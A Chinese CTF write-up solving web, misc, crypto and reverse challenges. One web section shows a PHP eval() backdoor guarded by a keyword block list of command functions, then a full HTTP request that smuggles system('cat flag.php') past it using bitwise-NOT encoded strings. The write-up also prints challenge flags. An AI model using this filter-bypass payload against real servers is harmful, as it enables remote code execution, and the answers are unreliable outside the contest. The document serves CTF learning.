没想到后面又那么多佬"藏flag"
最后排名 # 8
web
web签到
看源码直接看到flag
shuangyuCTF-web1
<?php
highlight_file('index.php');
// 密码锁PHP代码
// 这是一个超级复杂的密码生成函数(其实并不复杂)
function generate_password($seed) {
// 初始化一些变量
$a = 1;
$b = 1;
$n = $seed;
// 斐波那契数列生成,但是有点特别
for ($i = 0; $i < $n; $i++) {
$temp = $a + $b + $i; // 注意这里的变种斐波那契
$a = $b;
$b = $temp;
}
// 将最后的斐波那契数作为密码的一部分
$password_part1 = $b;
// 还有一些其他的运算
$password_part2 = ($seed * $seed + $seed + 1) % 1000; // 这是一个二次函数模运算
// 密码是这两部分的组合,但是中间有一个固定的分隔符
$password = $password_part1 . '-' . $password_part2;
return $password;
}
// 检查用户输入的密码是否正确
if (isset($_POST['password'])) {
$user_password = $_POST['password'];
$seed = $_SERVER['REMOTE_ADDR'] % 100; // 使用用户的IP地址作为种子
$correct_password = generate_password($seed);
if ($user_password === $correct_password) {
echo "密码正确,网页解锁!";
// 这里可以放置flag或者其他奖励内容
highlight_file('flag.php');
} else {
echo "密码错误,请重试。";
}
}
?>
<!-- 简单的HTML表单 -->
<!DOCTYPE html>
<html>
<head>
<title>密码锁</title>
</head>
<body>
<form method="post" action="index.php">
<label for="password">请输入密码:</label>
<input type="text" id="password" name="password">
<input type="submit" value="解锁">
</form>
</body>
</html>
这里是一个通过ip生成加密函数,然后登录
这里本地调试
调试代码
<?php
highlight_file('index.php');
// 密码锁PHP代码
// 这是一个超级复杂的密码生成函数(其实并不复杂)
function generate_password($seed) {
// 初始化一些变量
$a = 1;
$b = 1;
$n = $seed;
// 斐波那契数列生成,但是有点特别
for ($i = 0; $i < $n; $i++) {
$temp = $a + $b + $i; // 注意这里的变种斐波那契
$a = $b;
$b = $temp;
}
// 将最后的斐波那契数作为密码的一部分
$password_part1 = $b;
// 还有一些其他的运算
$password_part2 = ($seed * $seed + $seed + 1) % 1000; // 这是一个二次函数模运算
// 密码是这两部分的组合,但是中间有一个固定的分隔符
$password = $password_part1 . '-' . $password_part2;
return $password;
}
// 检查用户输入的密码是否正确
if (isset($_POST['password'])) {
$user_password = $_POST['password'];
$seed = "这里换成自己的ip" % 100; // 使用用户的IP地址作为种子
$correct_password = generate_password($seed);
echo $correct_password; //这里会输出加密后的密码
if ($user_password === $correct_password) {
echo "密码正确,网页解锁!";
// 这里可以放置flag或者其他奖励内容
highlight_file('flag.php');
} else {
echo "密码错误,请重试。";
}
}
?>
10927-307密码错误,请重试。
# 这里密码就通过上面的echo输出来了,
在回到题目输入密钥
Gscsed在线版
<?php
highlight_file(__FILE__);
//error_reporting(0);
include('flag.php');
//echo '禁止以任何方式获取webshell,删除系统文件,一经发现,定会溯源,后果自负';
$gt=$_GET['GT'];
$pt=$_POST['PT'];
$ggt=$_GET['GGT'];
$ppt=$_POST['PPT'];
$subgt=substr($flag,0,5);
$len=strlen($flag);
$subpt=substr($flag,$len-1,1);
if($pt==$subpt&&$gt==$subgt){
echo "进入下一层吧";
}else{
echo "你输啦";
}
function PTplus($pts)
{
if (preg_match('/(`|\$|a|s|e|p|require|include|phpinfo|exec|eval|systemctl|shell_exec|system)/i', $pts)) {
return false;
}else{
return true;
}
}
function GTplus($gts) {
if(strpos($gts, '***')){
return false;
}else{
return true;
}
}
if (PTplus($ppt)&>plus($ggt)){
eval($ppt);
echo "恭喜恭喜";
}else {
echo "再看看吧";
}
echo"\n"; 你输啦恭喜恭喜
直接取反绕过好了
POST /?GT=flag{&GGT=*** HTTP/1.1
Host: xiaoyus.cc:12831
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9
Content-Type: application/x-www-form-urlencoded
PT=}&PPT=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)
# (~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)
# systemcat flag.php
misc
1z_recover
打开题目,给了一个生瓜蛋图片
拖到010在尾巴发现倒叙的504b0304(zip压缩包)
提取数据,写脚本倒叙
扩展
zip头:50 4B 03 04 14 00 09 00
// (好像只有前四个字节是固定的)
zip尾:50 4B 05 06 00 00 00 00 02 00 02 00 B4 00 00 00 68 D4 00 00 00 00
// (好像只有前四个字节是固定的)
with open("1.txt","r") as f:
data = f.read()
#print(data)
# 每两个字符一组进行切片,然后倒序
reverdataed_data = ''.join([data[i:i+2] for i in range(0, len(data), 2)][::-1])
# 打印倒序后的结果
print(reverdataed_data)
输出的数据,转成压缩包
压缩包密码(当时爆两个多小时没出,问出题人说忘记放附件了😭)
密码:you_are_so_clever
压缩包里面一个flag.zip和一个hint
hint:奇怪,这不是压缩包吗.........怎么这么多11,等等,似乎是某种运算......
flag.zip打不开,放到010看一下
一眼异或
异或17(十进制)
解压
flag.jpg放到010发现尾巴有东西
base64解密:9527
给了key,就进行jpg key 解密
flag{C0n9ratu1ati0ns!_you_are_so_cool}
诗词
打开题目,提示压缩包
换成压缩包
找到一个图片,放到010看,还有压缩包
在分离
解压后发现不对,全是0字节
写脚本读时间戳
import os
for i in range(29):
filename = "D:\\Desktop\\s45\\45564564654\\{0}.txt".format(i)
file_attr = os.stat(filename)#读取文件属性
create_time = str(file_attr.st_ctime)#获取创建时间
print(chr(int(create_time[7:10])),end='')
# 应该是这个脚本,题目有问题
flag{0h!Y0u_4re_Time_M4ster!}
longpy
打开题目
是png图片修改宽高
拿到提示pyc
在回去看图片发现里面还藏着数据,pyc数据
导出pyc
反编译pyc拿到数据
拿去解码(base64换表)
提示Stegosaurus pyc
搜一下发现有隐写工具
CTF pyc之stegosaurus隐写_pyc隐写-CSDN博客
解密
flag{Pyc_to_stegosaurus}
看过那年的雪吗?
刚打开就有点熟悉,直接就是原题
2024_ctfshow_西瓜杯复现_647669776d757e83817372816e707479707c888789757c9278-CSDN博客
010打开文件
导出数据转换成压缩包,压缩包还是未加密
修改后拿到文件
一眼snow隐写
拿到一半
ctfshow{W1sh1ng_every0ne_4_
这题和诗词那题差不多
写时间戳提取脚本
import os
for i in range(11):
filename = "D:\\Desktop\\过那年的雪吗\\dsffdsa\\{0}.txt".format(i)
file_attr = os.stat(filename)#读取文件属性
alter_time = str(file_attr.st_mtime)#获取修改时间
print(chr(int(alter_time[7:10])),end='')
# key:ctfSh0w
使用oursecret
(这里注意,这个隐写图片要把尾巴的pk数据删除)
提取后文件,解密
ctfshow{W1sh1ng_every0ne_4_happy_time_pl4ying}
wu_kong
拿到两张图片
反色一下直接出
flag{9ba77acb-c736-70ee-1993-0d0c2a1012ee}
1z_disk_decode
打开提示 hint没看懂,(非预期直接爆破出密钥 natasha
)
把图片放到010进行分析
在问价的尾巴发现大量的多余的数据
导出
当时到这就懵了,这些数据也没有特征
后来出题人提示是某种磁盘加密
使用VeraCrypt进行解密
导出的数据是加密的文件,密钥就是图片(删除多余数据的图片)
挂载后拿到一个jpg图片
修改jpg的高度
flag{y0u_g0t_1t}
MoreHight
拿到图片修改高度
flag{Png_hight_hight}
海尔之眼
拿到题目两张图片
首先发现jpg后面有多余的数据,导出添加zip头,发现带密码的压缩包,去看看png图片
(看了两天😭)
隐隐约约可以看到key:15740
使用silenteye解密
flag{h@r_X4_Ya2}
FindSeed_MC
直接连上服务器,然后开挂
😁
使用的模组
flag{5880616f80d73e086ec577d7ad21ef99}
crypto
At
拿到题目
一眼顶针(颜文字解密颜文字加密 - 萌研社 - PcMoe!)
在随波逐流一下,出来的是 埃特巴什密码
flag{Ni_h@O_A!!!}
shuangyuCTF-AES & Base
拿到附件
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
# 以上是可能用到的库
# 您收到了一段使用AES-CBC模式加密的密文,同时您知道了密钥的一部分生成规则:
# 密钥的前8字节是固定的,后8字节是通过某个秘密字符串的后三位数字(000-999)与特定前缀(例如secret_)
# 进行SHA-256哈希后取前8字节得到的。您的任务是编写一个Python脚本,尝试所有可能的三位数字组合,
# 以找到正确的密钥,并解密密文,获取其中的flag。
# 固定的前8字节密钥部分
fixed_key_part = b'fixedpart'[:8]
# 秘密字符串的前缀
secret_prefix = b'secret_'
# Base64编码的密文和IV
encoded_data = '[lg/hfCVaU7OGl11oy7JsUzozFojJSjBmYt6BGY+sO/KCKkQxdXzHjiJP1AM0eoTH]'
# ----请写出你的解题过程,得到flag---------
直接续写就可以了
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
# 固定的前8字节密钥部分
fixed_key_part = b'fixedpart'[:8]
# 秘密字符串的前缀
secret_prefix = b'secret_'
# Base64编码的密文和IV
encoded_data = '[lg/hfCVaU7OGl11oy7JsUzozFojJSjBmYt6BGY+sO/KCKkQxdXzHjiJP1AM0eoTH]'
# 解码Base64,提取IV和密文
decoded_data = base64.b64decode(encoded_data)
iv = decoded_data[:16] # 前16字节是IV
ciphertext = decoded_data[16:] # 剩下的是密文
# 遍历000到999所有可能的组合
for i in range(1000):
# 生成后三位数字的字符串(例如:'000', '001', ..., '999')
suffix = f'{i:03}'.encode()
# 计算SHA-256哈希,并取前8字节
secret_key_part = hashlib.sha256(secret_prefix + suffix).digest()[:8]
# 将固定的前8字节和哈希后的后8字节组合成完整的AES密钥
key = fixed_key_part + secret_key_part
# 尝试使用该密钥进行AES-CBC解密
cipher = AES.new(key, AES.MODE_CBC, iv)
try:
# 解密并移除填充
plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
# 打印成功解密的结果(假设包含'flag'字样)
if b'flag' in plaintext:
print(f"Found key: {key.hex()}")
print(f"Decrypted flag: {plaintext.decode('utf-8')}")
break
except (ValueError, KeyError):
# 捕捉填充错误或解密失败的情况,继续尝试下一个密钥
continue
# Found key: 6669786564706172bccfe0b37c0a147f
# Decrypted flag: flag{Crypto_shuangyuSec_@2024}
shuangyuCTF-XOR
拿到题目
def xor_encrypt(data, key):
encrypted_data = bytearray()
for char in data:
encrypted_data.append(ord(char) ^ key)
return encrypted_data.hex() # 返回十六进制字符串作为加密结果
# 以下是使用该函数加密后的一个十六进制字符串:
encrypted_string = '7a6f796973746865666c6167'
# 加密时所用的密钥(key)是 13(注意:这只是一个示例,实际题目中可以使用不同的密钥)
key=13
# 你的任务是解密这个十六进制字符串,找出它隐藏的信息,并将其格式化为 flag{*}
# 请将你的答案以 print(f"flag{{{your_decrypted_message}}}") 的形式输出,即可得到flag
# 输出解密后的结果,请注意格式奥~.~
直接反推
写解密脚本
def xor_decrypt(encrypted_data, key):
decrypted_data = bytearray()
for i in range(0, len(encrypted_data), 2):
byte = int(encrypted_data[i:i+2], 16)
decrypted_data.append(byte ^ key)
return decrypted_data.decode()
# 加密的十六进制字符串
encrypted_hex_string = '7a6f796973746865666c6167'
# 解密密钥
key = 13
# 解密
decrypted_bytes = xor_decrypt(encrypted_hex_string, key)
# 格式化输出
print(f"flag{{{decrypted_bytes}}}")
# flag{wbtd~yehkalj}
Base签到
flag{baibai_CTF_685Xiaoyu}
你真的喜欢CTF吗?
密文
AABABAAAAAABABBAABBAAAABBABBBABBAAAABBBABABAAABABBABAAAABABAAABAAAAABABAABBAABAB ——辰
一眼培根,没想到最后flag是脑洞,整半天
Flag{falgdoyoulikectf}
没有key
拿到密文
UH6G2CXOVIYRJI2PXMPHVFXXWWYRRH2AXMNIZF2JXAYRBEFYWWSQRF2FWAYRBAXYXEWIPIXSWOARFIEFXMRIZFFXWASSTIFCXIOIZFFHTWWH6EFTYWSR2F2FVIPRLGFYWDMSTIXSVEYRJJPYXMPHVGXXWWUGRH2YXMTSHF2HTWWIFIXOWWTRBZFGVIYRZJFWWWWIBAPIVAYRJIOFXSRIZEFXWWRHJIFKVISH4FXDXAWIXIXTXMSIDF2JVIPRDEFXTVMSPGXJWAURJGOFXMUHXEFBWWYGRIPAXMQSZFXVXAYRJIXYTISIRH2AWAQRZJFXWESIZD2JWEURJGWFXAOHZGF2WSPSTIFSVEPRZFEFVAXRJIXXYWSIVD2HX5XGRHXWXMSIVG2JWWSRJF2GXEUHXEOIWSYGRIXIXMQSHF2QVAYSBIXXWMSSBZFFXIXHZJFYXOWIZI2IVEQRHZFGXWRIZD2JWAWIHIXGXHMR2FXJWAXHFIFXXWSRHF2BWIPHLAXWX4MSTG2SVMSRFGXYXWQHZGPBWSXGRH2AVMOIZF2BWAXHXIPVWWSRHH2KWIXHVIFYXEWIVI2SWMWRFEFQWMQHZJFEWATITH2KVIPR4FFGTWWITIXTWWSRBH2FTWXHBGFYYOWITAPSVAARFIEFXMYIXEFXWWWITH2AXMRRHF2ZXAWSXEXXXWSRZZFJWIQRRGFYWESIVE2RVEURHHMFXSYHXEFXWWRSTHFCVITRHF2LWAWH2EFRXMRIXJFIV5QRFGFXW5WITGXJVMSRJIPYXWYHXGFJWSYHJIXUVMASXF2XWAURFIXQTISIVZFIX5PHZIFUVAWIZH2IWWSRBI2YXARHVJFIWAZSTIFUVIOH4FFGXAWHJIFTWMSIVZFGXIPHVHFXXISIRF2JWWSRHFFGX42RXEPBWAXQRH2MXIQSHFFZXAYRBEFZWMSRXH2GXIQRVJFYXOSIZEXRWIQRHIFPXESIXE2XWAXRTIPCVIQRHFFKWAWR2EF2YSSHJH2GXSXHTAXYXHMSPFXJVMYRHH2XXWYHXFFBWSWIRHMHXIOIHFXVXAYRBEFSVMSQRD2GWAPGRGXYXEOIBI2SWOQRHIEFXMPHZFFBWASITIFAVITQXFXFTWXIPEFTXMQHVF2JTWPHJGFYWDMSTFXRWMARFGPQXMYIXGPTWWASTGXYXMSSRF2ZVAYSBEXVTIRIBZFGVAQSHFXUWWSH4JXSVD2HFIWFXAVIXEXXWEPITHEFVISRHE2TXAWGVEXUYWRHDH2IV5QRBFFXTWWIRF2JWIURJH2PXMXHXEPBWSQRTGFCXMSRHFFXXAYIXEXZXMSSBH2AWIPHZFFYVISIRF2JV5URJEWFXAPHZEP2WATRTIFUXITRHFFCTWWHJIXRYWSIVD2KXAPHLJFWV5SIRE2JWWORLFPGXAXIXF2BWWYGRIXKXIPSHF2UWAWR6IFYWWQIXF2GWIYRRIFYWWWIVI2SVMURHIFFXASHZJFMWWPSTIFGVIUSHFFTTWYRXIFPXWSHLH2KWIPHLIFXXDMSXAFSVMARHGXQXWSIXF2XWEYRJH2AVMOIHF2JTWXIBIXUWMSR6D2HWIXHDFFYWDMSPIXSWMARFEXYXWQHZJFAWASITHFKXISIZFFITWXIFIXTWWSHBH2JX5PHJFFUV5SITIXTVIYRFIFGXIYHXE2BWWWGRHFAXMQHHF2HTWWSXIXSXMRQXFFDTWXQZIXV
解密
rot13->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->rot13
flag{flagishere}
crypto2
密文
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()(([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])
直接js代码运行
flag{3e858ccd79287cfe8509f15a71b4c45d}
来道一元积分吧
拿到题目,有一个word,打开word解一元积分,拿到a=2
解开编码压缩包
拿到编码
RMbpoP9B1wmOMH8kLz9P0ml(I3v=
这里使用脚本
import base64
# 要编码的字符串
data = "RMbpoP9B1wmOMH8kLz9P0ml(I3v="
# 将字符串转换为字节
data_bytes = data.encode('utf-8')
# 使用base64进行Base85编码
encoded_bytes = base64.b85encode(data_bytes)
# 将编码后的字节转换回字符串
encoded_str = encoded_bytes.decode('utf-8')
print(f"Encoded Base85: {encoded_str}")
# Encoded Base85: QcYrTZ%{cxF?VfGO-MLvOnNy`Fl}roNi%jm
拿到得到数据解开flag压缩包
flag{I_LOVE_susu}
reverse
jeb
打开题目,找到mian函数开始分析
package com.example.crackme;
import android.app.Activity;
import android.os.Bundle;
import android.view.Menu;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
/* loaded from: classes.dex */
public class MainActivity extends Activity {
private Button btn_register;
private EditText edit_sn;
String edit_userName;
@Override // android.app.Activity
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
setTitle(R.string.unregister);
this.edit_userName = "Tenshine";
this.edit_sn = (EditText) findViewById(R.id.edit_sn);
this.btn_register = (Button) findViewById(R.id.button_register);
this.btn_register.setOnClickListener(new View.OnClickListener() { // from class: com.example.crackme.MainActivity.1
@Override // android.view.View.OnClickListener
public void onClick(View v) {
